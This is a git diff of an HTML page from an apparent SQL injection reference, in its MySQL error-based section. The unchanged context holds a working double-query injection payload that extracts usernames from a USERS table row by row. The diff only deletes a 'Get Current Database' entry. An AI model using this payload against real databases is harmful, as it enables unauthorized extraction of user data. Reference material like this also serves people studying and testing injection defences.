diff --git a/injectionTypes/errorBased/mysql.html b/injectionTypes/errorBased/mysql.html
index 53debef..49759e9 100644
--- a/injectionTypes/errorBased/mysql.html
+++ b/injectionTypes/errorBased/mysql.html
@@ -37,9 +37,5 @@
Error Based
Double Query |
SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM USERS LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)
Increment Limit 0,1 to Limit 1,1 to begin cycling through data |
-
- Get Current Database |
- SELECT a() |
-